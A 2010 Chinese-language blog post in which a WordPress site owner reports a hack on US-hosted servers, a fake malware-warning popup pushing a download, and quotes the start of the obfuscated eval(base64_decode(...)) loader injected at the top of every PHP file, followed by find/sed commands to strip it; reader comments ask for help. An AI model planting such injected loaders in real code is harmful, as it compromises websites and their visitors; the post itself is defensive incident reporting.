当前位置: 首页 >> WordPress >> 文章正文

Warning! Your computer is at risk of malware attacks!-GoDDay空间被攻击!

时间: 2010-05-20 - 分类: WordPress
/* 300x250 */

晚上登陆几个网站的时候,莫名其妙的弹出窗口说:

Warning! Your computer is at risk of malware attacks!

We recommend you to check your system immediately! Press OK to start the process now!

如果点击OK则会出现英文界面的病毒扫描图片,显示磁盘全部被共享。这显然不是我的电脑的界面,再点击图片的话,会提示下载一个文件,明显是木马或者病毒!如果你碰到的话,千万不要下载。吓的我赶紧拔掉网线,扫描电脑!

godaddy-wp-hack7

扫描结果是没有木马或病毒。于是继续使用,结果发现只要上Dreamhost的网站就会弹出这个窗口,搜索了一下,发现是最近Godaddy和Dreamhost等美国host供应商的服务器受到php攻击,具体情况可以看一下的分析:

http://stopmalvertising.com/malvertisements/godaddy-hacked-wordpress-blogs-affected/all-pages

http://www.wpsecuritylock.com/cechriecom-com-script-wordpress-hacked-on-godaddy-case-study/

登陆ftp查看php文件就发现所有的php文件的头部都已经被加上了一段代码,如下所示:

<?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJE
dMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOy
AgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmd
W5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgIC

直接崩溃了,马上去联系空间服务商,空间商解释说不是空间的问题,是一种通过ftp客户端感染的病毒,建议我马上彻底扫描和杀毒自己的电脑,然后通过web控制面板更换ftp的密码,并对网站的文件进行处理。

清除头部被注入代码的方法可以通过SSH执行如下的命令:

$ find ./ -name "*.php" -type f | \
  xargs sed -i 's#<?php /\*\*/ eval(base64_decode("aWY.*?>##g' 2>&1
$ find ./ -name "*.php" -type f | \
  xargs sed -i '/./,$!d' 2>&1

Tags: , ,

上一篇:
下一篇:

6 Responses to “Warning! Your computer is at risk of malware attacks!-GoDDay空间被攻击!”

  1. 柯涛 说道:
    2012/02/05 12:14 上午

    我也碰到了这种情况,我打开这种网页后没有点下载,请问这样会不会感染病毒,我后来用MSE扫描电脑,没有发现病毒,真的没有感染吗

    回复
  2. leexingliang 说道:
    2010/09/18 12:39 下午

    楼主,你好,我的网站今天出现这个问题,我的 服务器在godaddy. 请问有没有详细的解决办法?? 感谢。

    回复
    • Victor 说道:
      2010/09/18 9:27 下午

      @leexingliang 你好,你可以仔细看一下最后一小段。我的网站是中了病毒。用那一段代码把空间上所有php文件被注入的代码清除掉就OK了。当时怀疑是用了一个不知名的ftp软件导致的。

      回复
  3. 朽木 说道:
    2010/05/22 6:35 下午

    好久没来,一进来就发现个爆炸性信息,猴哥居然用E文系统

    回复
  4. 秦大少 说道:
    2010/05/21 11:44 下午

    这病毒很牛啊

    回复

发表评论

提示: 允许使用'@user空格'将自己的评论通知另外评论者。使用'@all ',将会将评论发送给之前所有其它评论者。注意user必须和评论者名相匹配(大小写一致)。